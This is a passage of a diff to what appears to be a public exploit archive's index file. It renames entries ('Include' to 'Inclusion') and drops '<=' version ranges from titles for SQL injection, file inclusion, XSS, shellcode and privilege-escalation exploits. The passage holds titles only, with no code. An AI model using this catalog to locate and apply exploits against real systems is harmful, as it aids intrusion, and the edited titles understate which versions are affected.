Vulnerabilities",2011-04-15,KedAns-Dz,php,webapps,0 35620,platforms/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router 'url' Parameter Cross-Site Scripting",2011-04-15,"Edgard Chammas",hardware,remote,0 -35621,platforms/php/webapps/35621.txt,"4Images 1.7.9 - Multiple Remote File Include and SQL Injection Vulnerabilities",2011-04-16,KedAns-Dz,php,webapps,0 +35621,platforms/php/webapps/35621.txt,"4Images 1.7.9 - Multiple Remote File Inclusion and SQL Injection Vulnerabilities",2011-04-16,KedAns-Dz,php,webapps,0 35622,platforms/windows/dos/35622.txt,"Wickr Desktop 2.2.1 Windows - Denial of Service",2014-12-27,Vulnerability-Lab,windows,dos,0 35623,platforms/multiple/webapps/35623.txt,"Pimcore 3.0 & 2.3.0 CMS - SQL Injection",2014-12-27,Vulnerability-Lab,multiple,webapps,0 35624,platforms/php/webapps/35624.txt,"PHPLIST 3.0.6 & 3.0.10 - SQL Injection",2014-12-27,Vulnerability-Lab,php,webapps,0 -35625,platforms/php/webapps/35625.txt,"PMB <= 4.1.3 - Post-Auth SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0 -35626,platforms/php/webapps/35626.txt,"Easy File Sharing Webserver <= 6.8 - Persistent XSS",2014-12-27,"Sick Psycko",php,webapps,0 -35629,platforms/php/webapps/35629.txt,"chillyCMS 1.2.1 - Multiple Remote File Include Vulnerabilities",2011-04-16,KedAns-Dz,php,webapps,0 -35630,platforms/php/webapps/35630.txt,"Joomla Component - 'com_phocadownload' Local File Include",2011-04-18,KedAns-Dz,php,webapps,0 +35625,platforms/php/webapps/35625.txt,"PMB 4.1.3 - Post-Auth SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0 +35626,platforms/php/webapps/35626.txt,"Easy File Sharing Webserver 6.8 - Persistent XSS",2014-12-27,"Sick Psycko",php,webapps,0 +35629,platforms/php/webapps/35629.txt,"chillyCMS 1.2.1 - Multiple Remote File Inclusion Vulnerabilities",2011-04-16,KedAns-Dz,php,webapps,0 +35630,platforms/php/webapps/35630.txt,"Joomla Component - 'com_phocadownload' Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0 35631,platforms/php/webapps/35631.txt,"CRESUS 'recette_detail.php' SQL Injection",2011-04-19,"GrayHatz Security Group",php,webapps,0 -35632,platforms/php/webapps/35632.txt,"XOOPS 2.5 - 'imagemanager.php' Local File Include",2011-04-18,KedAns-Dz,php,webapps,0 +35632,platforms/php/webapps/35632.txt,"XOOPS 2.5 - 'imagemanager.php' Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0 35633,platforms/php/webapps/35633.txt,"Ultra Marketing Enterprises CMS and Cart Multiple SQL Injection Vulnerabilities",2011-04-19,eXeSoul,php,webapps,0 35634,platforms/php/webapps/35634.txt,"WordPress WP-StarsRateBox Plugin 1.1 - 'j' Parameter SQL Injection",2011-04-19,"High-Tech Bridge SA",php,webapps,0 35635,platforms/php/webapps/35635.txt,"Dalbum 1.43 - 'editini.php' Cross-Site Scripting",2011-04-19,"High-Tech Bridge SA",php,webapps,0 35636,platforms/php/webapps/35636.txt,"ChatLakTurk php Botlu Video 'ara.php' Cross-Site Scripting",2011-04-19,"kurdish hackers team",php,webapps,0 -35637,platforms/android/remote/35637.py,"WhatsApp <= 2.11.476 - Remote Reboot/Crash App Android",2014-12-28,"Daniel Godoy",android,remote,0 +35637,platforms/android/remote/35637.py,"WhatsApp 2.11.476 - Remote Reboot/Crash App Android",2014-12-28,"Daniel Godoy",android,remote,0 35638,platforms/multiple/remote/35638.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/E1Menu.maf jdeowpBackButtonProtect Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 35639,platforms/multiple/remote/35639.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/E1Menu_Menu.mafService e1.namespace Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 35640,platforms/multiple/remote/35640.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/E1Menu_OCL.mafService e1.namespace Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 @@ -32120,11 +32120,11 @@ id,file,description,date,author,platform,type,port 35659,platforms/php/webapps/35659.txt,"Social Microblogging PRO 1.5 Stored XSS",2014-12-31,"Halil Dalabasmaz",php,webapps,80 35644,platforms/linux/remote/35644.txt,"Viola DVR VIO-4/1000 - Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,linux,remote,0 35645,platforms/php/webapps/35645.txt,"Automagick Tube Script 1.4.4 - 'module' Parameter Cross-Site Scripting",2011-04-20,Kurd-Team,php,webapps,0 -35647,platforms/php/webapps/35647.txt,"SyCtel Design 'menu' Parameter Multiple Local File Include Vulnerabilities",2011-04-21,"Ashiyane Digital Security Team",php,webapps,0 +35647,platforms/php/webapps/35647.txt,"SyCtel Design 'menu' Parameter Multiple Local File Inclusion Vulnerabilities",2011-04-21,"Ashiyane Digital Security Team",php,webapps,0 35648,platforms/php/webapps/35648.txt,"Zenphoto 1.4.0.3 - '_zp_themeroot' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",php,webapps,0 35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Parameter Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0 35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie Parameter SQL Injection",2011-04-21,"AutoSec Tools",php,webapps,0 -35651,platforms/php/webapps/35651.txt,"Dolibarr 3.0 - Local File Include and Cross-Site Scripting Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0 +35651,platforms/php/webapps/35651.txt,"Dolibarr 3.0 - Local File Inclusion and Cross-Site Scripting Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0 35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Pre-Auth RCE",2014-12-30,drone,windows,remote,0 35657,platforms/php/webapps/35657.php,"Sermon Browser WordPress Plugin 0.43 - Cross-Site Scripting and SQL Injection Vulnerabilities",2011-04-26,Ma3sTr0-Dz,php,webapps,0 35655,platforms/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Parameter Cross-Site Scripting",2011-04-25,"AutoSec Tools",php,webapps,0 @@ -32136,7 +32136,7 @@ id,file,description,date,author,platform,type,port 35661,platforms/windows/local/35661.txt,"Windows 8.1 (32/64 bit) - Privilege Escalation (ahcache.sys/NtApphelpCacheControl)",2015-01-01,"Google Security Research",windows,local,0 35654,platforms/windows/dos/35654.py,"AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service",2011-04-25,"Antu Sanadi",windows,dos,0 35663,platforms/php/webapps/35663.txt,"WP Ajax Recent Posts WordPress Plugin 1.0.1 - 'do' Parameter Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 -35653,platforms/php/webapps/35653.txt,"Nuke Evolution Xtreme 2.0 - Local File Include and SQL Injection Vulnerabilities",2011-04-22,KedAns-Dz,php,webapps,0 +35653,platforms/php/webapps/35653.txt,"Nuke Evolution Xtreme 2.0 - Local File Inclusion and SQL Injection Vulnerabilities",2011-04-22,KedAns-Dz,php,webapps,0 35665,platforms/php/webapps/35665.txt,"PHP F1 Max's Photo Album - 'showimage.php' Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35666,platforms/php/webapps/35666.txt,"Football Website Manager 1.1 SQL Injection and Multiple HTML Injection Vulnerabilities",2011-04-26,RoAd_KiLlEr,php,webapps,0 35667,platforms/php/webapps/35667.txt,"Joostina - Multiple Components SQL Injection",2011-04-27,KedAns-Dz,php,webapps,0 @@ -32146,7 +32146,7 @@ id,file,description,date,author,platform,type,port 35677,platforms/php/webapps/35677.txt,"eyeOS 1.9.0.2 Image File Handling HTML Injection",2011-04-25,"Alberto Ortega",php,webapps,0 35678,platforms/php/webapps/35678.txt,"phpGraphy 0.9.13 b 'theme_dir' Parameter Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps,0 35679,platforms/php/webapps/35679.txt,"e107 2 Bootstrap CMS - XSS",2015-01-03,"Ahmet Agar / 0x97",php,webapps,0 -35680,platforms/php/webapps/35680.txt,"ClanSphere 2011.0 - Local File Include and Arbitrary File Upload Vulnerabilities",2011-04-28,KedAns-Dz,php,webapps,0 +35680,platforms/php/webapps/35680.txt,"ClanSphere 2011.0 - Local File Inclusion and Arbitrary File Upload Vulnerabilities",2011-04-28,KedAns-Dz,php,webapps,0 35681,platforms/linux/local/35681.txt,"OProfile 0.9.6 - 'opcontrol' Utility 'set_event()' Local Privilege Escalation",2011-04-29,"Stephane Chauveau",linux,local,0 35682,platforms/php/webapps/35682.txt,"Tine 2.0 - 'vbook.php' Cross Site Scripting",2011-04-30,"AutoSec Tools",php,webapps,0 35683,platforms/java/webapps/35683.txt,"LANSA aXes Web Terminal TN5250 - 'axes_default.css' Cross Site Scripting",2011-05-02,"Patrick Webster",java,webapps,0 @@ -32165,7 +32165,7 @@ id,file,description,date,author,platform,type,port 35712,platforms/windows/local/35712.rb,"BulletProof FTP Client - BPS Buffer Overflow",2015-01-06,Metasploit,windows,local,0 35701,platforms/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Parameter Cross Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35702,platforms/php/webapps/35702.txt,"Multiple GoT.MY Products 'theme_dir' Parameter Cross Site Scripting",2011-05-03,Hector.x90,php,webapps,0 -35703,platforms/multiple/remote/35703.py,"sipdroid <= 2.2 SIP INVITE Response User Enumeration Weakness",2011-05-04,"Anibal Vaz Marques",multiple,remote,0 +35703,platforms/multiple/remote/35703.py,"sipdroid 2.2 SIP INVITE Response User Enumeration Weakness",2011-05-04,"Anibal Vaz Marques",multiple,remote,0 35704,platforms/php/webapps/35704.txt,"WP Ajax Calendar 1.0 - 'example.php' Cross Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps,0 35705,platforms/php/webapps/35705.txt,"PHP Directory Listing Script 3.1 - 'index.php' Cross Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps,0 35706,platforms/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 Default Account and Multiple Cross Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0 @@ -32176,7 +32176,7 @@ id,file,description,date,author,platform,type,port 35711,platforms/android/local/35711.c,"Nexus 5 Android 5.0 - Local Root Exploit",2015-01-06,retme,android,local,0 35715,platforms/php/webapps/35715.txt,"encoder 0.4.10 - 'edit.php' Cross Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 35716,platforms/php/webapps/35716.html,"Ampache 3.5.4 - 'login.php' Cross Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 -35717,platforms/php/webapps/35717.txt,"Exponent CMS 2.0.0 beta 1.1 Local File Include and Arbitrary File Upload Vulnerabilities",2011-05-09,"AutoSec Tools",php,webapps,0 +35717,platforms/php/webapps/35717.txt,"Exponent CMS 2.0.0 beta 1.1 Local File Inclusion and Arbitrary File Upload Vulnerabilities",2011-05-09,"AutoSec Tools",php,webapps,0 35718,platforms/php/webapps/35718.txt,"Gelsheet 1.02 - 'index.php' Cross Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 35719,platforms/php/webapps/35719.py,"phpWebSite 1.7.1 - 'upload.php' Arbitrary File Upload",2011-05-09,"AutoSec Tools",php,webapps,0 35720,platforms/php/webapps/35720.txt,"Microweber CMS 0.95 - SQL Injection",2015-01-07,"Pham Kien Cuong",php,webapps,80 @@ -32185,7 +32185,7 @@ id,file,description,date,author,platform,type,port 35723,platforms/php/webapps/35723.txt,"TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injection Vulnerabilities",2011-05-01,"AutoSec Tools",php,webapps,0 35724,platforms/php/webapps/35724.txt,"EmbryoCore 1.03 - 'index.php' SQL Injection",2011-05-09,KedAns-Dz,php,webapps,0 35725,platforms/multiple/dos/35725.pl,"Perl 5.10 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",multiple,dos,0 -35726,platforms/php/webapps/35726.py,"GetSimple 3.0 - 'set' Parameter Local File Include",2011-05-07,"AutoSec Tools",php,webapps,0 +35726,platforms/php/webapps/35726.py,"GetSimple 3.0 - 'set' Parameter Local File Inclusion",2011-05-07,"AutoSec Tools",php,webapps,0 35727,platforms/php/webapps/35727.txt,"HOMEPIMA Design 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,php,webapps,0 35728,platforms/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 Multiple Cross Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",asp,webapps,0 35729,platforms/multiple/remote/35729.txt,"Imperva SecureSphere SQL Query Filter Security Bypass",2011-05-09,@drk1wi,multiple,remote,0 @@ -32217,15 +32217,15 @@ id,file,description,date,author,platform,type,port 35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 - 'login/login.php' Cross Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 - 'history.php' Cross Site Scripting",2011-05-12,"AutoSec Tools",php,webapps,0 35756,platforms/php/webapps/35756.txt,"openQRM 4.8 - 'source_tab' Parameter Cross Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 -35757,platforms/php/webapps/35757.txt,"eFront <= 3.6.9 - 'scripts.php' Local File Include",2011-05-16,"AutoSec Tools",php,webapps,0 +35757,platforms/php/webapps/35757.txt,"eFront 3.6.9 - 'scripts.php' Local File Inclusion",2011-05-16,"AutoSec Tools",php,webapps,0 35759,platforms/php/webapps/35759.txt,"eFront 3.6.9 - 'submitScore.php' Cross Site Scripting",2011-05-16,"John Leitch",php,webapps,0 35760,platforms/php/webapps/35760.txt,"PHP Calendar Basic 2.3 Multiple Cross Site Scripting Vulnerabilities",2011-05-17,"High-Tech Bridge SA",php,webapps,0 -35761,platforms/php/webapps/35761.txt,"TWiki <= 5.0.1 - 'origurl' Parameter Cross Site Scripting",2011-05-18,"Mesut Timur",php,webapps,0 -35762,platforms/hardware/remote/35762.txt,"Cisco Unified Operations Manager <= 8.5 iptm/advancedfind.do extn Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 -35763,platforms/hardware/remote/35763.txt,"Cisco Unified Operations Manager <= 8.5 iptm/ddv.do deviceInstanceName Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 -35764,platforms/hardware/remote/35764.txt,"Cisco Unified Operations Manager <= 8.5 iptm/eventmon Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 -35765,platforms/hardware/remote/35765.txt,"Cisco Unified Operations Manager <= 8.5 iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 -35766,platforms/hardware/remote/35766.txt,"Cisco Unified Operations Manager <= 8.5 iptm/logicalTopo.do Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 +35761,platforms/php/webapps/35761.txt,"TWiki 5.0.1 - 'origurl' Parameter Cross Site Scripting",2011-05-18,"Mesut Timur",php,webapps,0 +35762,platforms/hardware/remote/35762.txt,"Cisco Unified Operations Manager 8.5 iptm/advancedfind.do extn Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 +35763,platforms/hardware/remote/35763.txt,"Cisco Unified Operations Manager 8.5 iptm/ddv.do deviceInstanceName Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 +35764,platforms/hardware/remote/35764.txt,"Cisco Unified Operations Manager 8.5 iptm/eventmon Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 +35765,platforms/hardware/remote/35765.txt,"Cisco Unified Operations Manager 8.5 iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 +35766,platforms/hardware/remote/35766.txt,"Cisco Unified Operations Manager 8.5 iptm/logicalTopo.do Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 35767,platforms/php/webapps/35767.txt,"Gecko CMS 2.3 - Multiple Vulnerabilities",2015-01-13,LiquidWorm,php,webapps,80 35998,platforms/php/webapps/35998.txt,"CobraScripts Trading Marketplace Script 'cid' Parameter SQL Injection",2011-07-25,Ehsan_Hp200,php,webapps,0 35786,platforms/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",multiple,webapps,80 @@ -32238,12 +32238,12 @@ id,file,description,date,author,platform,type,port 35776,platforms/java/remote/35776.rb,"Lexmark MarkVision Enterprise Arbitrary File Upload",2015-01-13,Metasploit,java,remote,9788 35777,platforms/windows/remote/35777.rb,"Oracle MySQL for Microsoft Windows - FILE Privilege Abuse",2015-01-13,Metasploit,windows,remote,0 35778,platforms/php/remote/35778.rb,"WordPress WP Symposium 14.11 - Shell Upload",2015-01-13,Metasploit,php,remote,80 -35779,platforms/hardware/remote/35779.txt,"CiscoWorks Common Services Framework <= 3.1.1 Help Servlet Cross Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 -35780,platforms/hardware/remote/35780.txt,"Cisco Unified Operations Manager <= 8.5 Common Services Device Center Cross Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 -35781,platforms/java/webapps/35781.txt,"CiscoWorks Common Services <= 3.1.1 Auditing Directory Traversal",2011-05-18,"Sense of Security",java,webapps,0 +35779,platforms/hardware/remote/35779.txt,"CiscoWorks Common Services Framework 3.1.1 Help Servlet Cross Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 +35780,platforms/hardware/remote/35780.txt,"Cisco Unified Operations Manager 8.5 Common Services Device Center Cross Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 +35781,platforms/java/webapps/35781.txt,"CiscoWorks Common Services 3.1.1 Auditing Directory Traversal",2011-05-18,"Sense of Security",java,webapps,0 35782,platforms/php/webapps/35782.txt,"Room Juice 0.3.3 - 'display.php' Cross Site Scripting",2011-05-19,"AutoSec Tools",php,webapps,0 35783,platforms/php/webapps/35783.html,"Andy's PHP Knowledgebase 0.95.4 - 'step5.php' Remote PHP Code Execution",2011-05-19,"AutoSec Tools",php,webapps,0 -35784,platforms/linux/remote/35784.php,"Zend Framework <= 1.11.4 - 'PDO_MySql' Security Bypass",2011-05-19,"Anthony Ferrara",linux,remote,0 +35784,platforms/linux/remote/35784.php,"Zend Framework 1.11.4 - 'PDO_MySql' Security Bypass",2011-05-19,"Anthony Ferrara",linux,remote,0 35785,platforms/linux/remote/35785.txt,"klibc 1.5.2 DHCP Options Processing Remote Shell Command Execution",2011-05-18,"maximilian attems",linux,remote,0 35787,platforms/php/webapps/35787.txt,"LimeSurvey 1.85+ 'admin.php' Cross Site Scripting",2011-05-19,"Juan Manuel Garcia",php,webapps,0 35788,platforms/php/webapps/35788.txt,"Joomla! 'com_maplocator' Component 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0 @@ -32255,7 +32255,7 @@ id,file,description,date,author,platform,type,port 35794,platforms/win_x86-64/shellcode/35794.txt,"Windows x64 - Obfuscated Shellcode Add Administrator _ALI_ & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86-64,shellcode,0 35803,platforms/php/webapps/35803.txt,"Cotonti 0.9.2 Multiple SQL Injection Vulnerabilities",2011-05-30,KedAns-Dz,php,webapps,0 35804,platforms/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 - 'libnvbasics.dll' Remote Denial of Service",2011-05-28,"Luigi Auriemma",windows,dos,0 -35796,platforms/php/webapps/35796.txt,"MidiCMS Website Builder Local File Include and Arbitrary File Upload Vulnerabilities",2011-05-25,KedAns-Dz,php,webapps,0 +35796,platforms/php/webapps/35796.txt,"MidiCMS Website Builder Local File Inclusion and Arbitrary File Upload Vulnerabilities",2011-05-25,KedAns-Dz,php,webapps,0 35797,platforms/php/webapps/35797.txt,"Joomla! 'com_shop' Component SQL Injection",2011-05-25,"ThunDEr HeaD",php,webapps,0 35798,platforms/php/webapps/35798.txt,"Kryn.cms 0.9 - '_kurl' Parameter Cross Site Scripting",2011-05-25,"AutoSec Tools",php,webapps,0 35799,platforms/linux/remote/35799.txt,"Vordel Gateway 6.0.3 Directory Traversal",2011-05-25,"Brian W. Gary",linux,remote,0 @@ -32292,7 +32292,7 @@ id,file,description,date,author,platform,type,port 35830,platforms/php/webapps/35830.txt,"Multiple WordPress WooThemes - 'test.php' Cross Site Scripting",2011-06-06,MustLive,php,webapps,0 35831,platforms/php/webapps/35831.txt,"PopScript 'index.php' Multiple Input Validation Vulnerabilities",2011-06-06,NassRawI,php,webapps,0 35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 - 'colour_picker.php' Cross Site Scripting",2011-06-06,"Patrick Webster",php,webapps,0 -35833,platforms/php/webapps/35833.txt,"Xataface 1.x - 'action' Parameter Local File Include",2011-06-07,ITSecTeam,php,webapps,0 +35833,platforms/php/webapps/35833.txt,"Xataface 1.x - 'action' Parameter Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0 35834,platforms/php/webapps/35834.txt,"BLOG:CMS 4.2 Multiple Cross Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0 35835,platforms/php/webapps/35835.txt,"WordPress GD Star Rating Plugin 'votes' Parameter - SQL Injection",2011-06-08,anonymous,php,webapps,0 35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module 'results()' Security Bypass",2011-06-08,dst,linux,remote,0 @@ -32316,7 +32316,7 @@ id,file,description,date,author,platform,type,port 35852,platforms/asp/webapps/35852.txt,"Microsoft Lync Server 2010 - 'ReachJoin.aspx' Remote Command Injection",2011-06-13,"Mark Lachniet",asp,webapps,0 35853,platforms/php/webapps/35853.php,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (1)",2011-06-13,pentesters.ir,php,webapps,0 35854,platforms/php/webapps/35854.pl,"PHP-Nuke 8.3 - 'upload.php' Arbitrary File Upload (2)",2011-06-13,pentesters.ir,php,webapps,0 -35855,platforms/php/remote/35855.txt,"PHP <= 5.3.6 - Security Bypass",2011-06-14,"Krzysztof Kotowicz",php,remote,0 +35855,platforms/php/remote/35855.txt,"PHP 5.3.6 - Security Bypass",2011-06-14,"Krzysztof Kotowicz",php,remote,0 35856,platforms/multiple/dos/35856.html,"Opera Web Browser 11.11 Denial of Service",2011-06-14,echo,multiple,dos,0 35857,platforms/php/webapps/35857.txt,"ArticleFR CMS 3.0.5 - SQL Injection",2015-01-21,TranDinhTien,php,webapps,0 35858,platforms/php/webapps/35858.txt,"ArticleFR CMS 3.0.5 - Arbitrary File Upload",2015-01-21,TranDinhTien,php,webapps,0 @@ -32359,7 +32359,7 @@ id,file,description,date,author,platform,type,port 35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 NULL Pointer Dereference Denial Of Service",2011-06-28,"Luigi Auriemma",windows,dos,0 35896,platforms/php/webapps/35896.txt,"FlatPress 0.1010.1 Multiple Cross Site Scripting Vulnerabilities",2011-06-28,"High-Tech Bridge SA",php,webapps,0 35897,platforms/windows/remote/35897.html,"CygniCon CyViewer ActiveX Control 'SaveData()' Insecure Method",2011-06-28,"High-Tech Bridge SA",windows,remote,0 -35898,platforms/multiple/remote/35898.php,"Atlassian JIRA <= 3.13.5 File Download Security Bypass",2011-06-28,"Ignacio Garrido",multiple,remote,0 +35898,platforms/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 File Download Security Bypass",2011-06-28,"Ignacio Garrido",multiple,remote,0 35899,platforms/php/webapps/35899.txt,"Mangallam CMS - SQL Injection Web",2015-01-26,Vulnerability-Lab,php,webapps,0 35900,platforms/cgi/webapps/35900.txt,"Barracuda Networks Cloud Series - Filter Bypass",2015-01-26,Vulnerability-Lab,cgi,webapps,0 35901,platforms/windows/local/35901.txt,"VLC Player 2.1.5 - DEP Access Violation",2015-01-26,"Veysel HATAS",windows,local,0 @@ -32372,7 +32372,7 @@ id,file,description,date,author,platform,type,port 35913,platforms/android/dos/35913.txt,"Android WiFi-Direct Denial of Service",2015-01-26,"Core Security",android,dos,0 35910,platforms/jsp/webapps/35910.txt,"ManageEngine EventLog Analyzer 9.0 - Directory Traversal / XSS Vulnerabilities",2015-01-26,"Sepahan TelCom IT Group",jsp,webapps,0 35911,platforms/multiple/webapps/35911.txt,"jclassifiedsmanager - Multiple Vulnerabilities",2015-01-26,"Sarath Nair",multiple,webapps,0 -36313,platforms/php/webapps/36313.txt,"webERP <= 4.3.8 Multiple Script URI XSS",2011-11-17,"High-Tech Bridge SA",php,webapps,0 +36313,platforms/php/webapps/36313.txt,"webERP 4.3.8 Multiple Script URI XSS",2011-11-17,"High-Tech Bridge SA",php,webapps,0 35982,platforms/windows/webapps/35982.txt,"Hewlett-Packard UCMDB - JMX-Console Authentication Bypass",2015-02-03,"Hans-Martin Muench",windows,webapps,8080 35983,platforms/windows/local/35983.rb,"MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape",2015-02-03,Metasploit,windows,local,0 35988,platforms/php/webapps/35988.txt,"Support Incident Tracker (SiT!) 3.63 p1 - tasks.php selected[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 @@ -32387,7 +32387,7 @@ id,file,description,date,author,platform,type,port 35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 - Multiple 'libc/net' Functions Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0 35920,platforms/php/webapps/35920.txt,"WebCalendar 1.2.3 Multiple Cross Site Scripting Vulnerabilities",2011-07-04,"Stefan Schurtz",php,webapps,0 35921,platforms/windows/remote/35921.html,"iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow",2011-07-04,KedAns-Dz,windows,remote,0 -35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component 'controller' Parameter Local File Include",2011-07-05,FL0RiX,php,webapps,0 +35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component 'controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0 35923,platforms/asp/webapps/35923.txt,"Paliz Portal Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-07-02,Net.Edit0r,asp,webapps,0 35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass Exploit",2015-01-28,"Jeremy Brown",windows,remote,0 35925,platforms/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway Multiple Security Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote,0 @@ -32437,18 +32437,18 @@ id,file,description,date,author,platform,type,port 35971,platforms/php/webapps/35971.txt,"WordPress bSuite Plugin 4.0.7 - Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps,0 35972,platforms/php/webapps/35972.txt,"Sefrengo CMS 1.6.1 - Multiple SQL Injection Vulnerabilities",2015-02-02,"ITAS Team",php,webapps,0 35973,platforms/php/webapps/35973.txt,"Joomla! 1.6.5 and Prior Multiple Cross Site Scripting Vulnerabilities",2011-07-20,"YGN Ethical Hacker Group",php,webapps,0 -35974,platforms/php/webapps/35974.txt,"Tiki Wiki CMS Groupware <= 7.2 - 'snarf_ajax.php' Cross Site Scripting",2011-07-20,"High-Tech Bridge SA",php,webapps,0 +35974,platforms/php/webapps/35974.txt,"Tiki Wiki CMS Groupware 7.2 - 'snarf_ajax.php' Cross Site Scripting",2011-07-20,"High-Tech Bridge SA",php,webapps,0 35975,platforms/php/webapps/35975.txt,"Cyberoam UTM Multiple Cross Site Scripting Vulnerabilities",2011-07-20,"Patrick Webster",php,webapps,0 35976,platforms/php/webapps/35976.txt,"Synergy Software 'id' Parameter SQL Injection",2011-07-21,Ehsan_Hp200,php,webapps,0 35977,platforms/php/webapps/35977.txt,"Godly Forums 'id' Parameter SQL Injection",2011-07-25,3spi0n,php,webapps,0 35978,platforms/php/webapps/35978.txt,"Online Grades 3.2.5 Multiple Cross Site Scripting Vulnerabilities",2011-07-25,"Gjoko Krstic",php,webapps,0 35979,platforms/php/webapps/35979.txt,"Willscript Recipes Website Script Silver Edition 'viewRecipe.php' SQL Injection",2011-07-25,Lazmania61,php,webapps,0 36040,platforms/php/webapps/36040.txt,"Chamilo LMS 1.9.8 Blind SQL Injection",2015-02-09,"Kacper Szurek",php,webapps,80 -36000,platforms/php/webapps/36000.txt,"HP Network Automation <= 9.10 SQL Injection",2011-07-28,anonymous,php,webapps,0 -36001,platforms/asp/webapps/36001.txt,"Sitecore CMS <= 6.4.1 - 'url' Parameter URI Redirection",2011-07-28,"Tom Neaves",asp,webapps,0 +36000,platforms/php/webapps/36000.txt,"HP Network Automation 9.10 SQL Injection",2011-07-28,anonymous,php,webapps,0 +36001,platforms/asp/webapps/36001.txt,"Sitecore CMS 6.4.1 - 'url' Parameter URI Redirection",2011-07-28,"Tom Neaves",asp,webapps,0 36002,platforms/jsp/webapps/36002.txt,"IBM Tivoli Service Automation Manager 7.2.4 - Remote Code Execution",2014-12-12,"Jakub Palaczynski",jsp,webapps,0 -36003,platforms/php/webapps/36003.txt,"Curverider Elgg <= 1.7.9 Multiple Cross Site Scripting Vulnerabilities",2011-08-01,"Aung Khant",php,webapps,0 -36004,platforms/multiple/remote/36004.txt,"Skype <= 5.3 - 'Mobile Phone' Field HTML 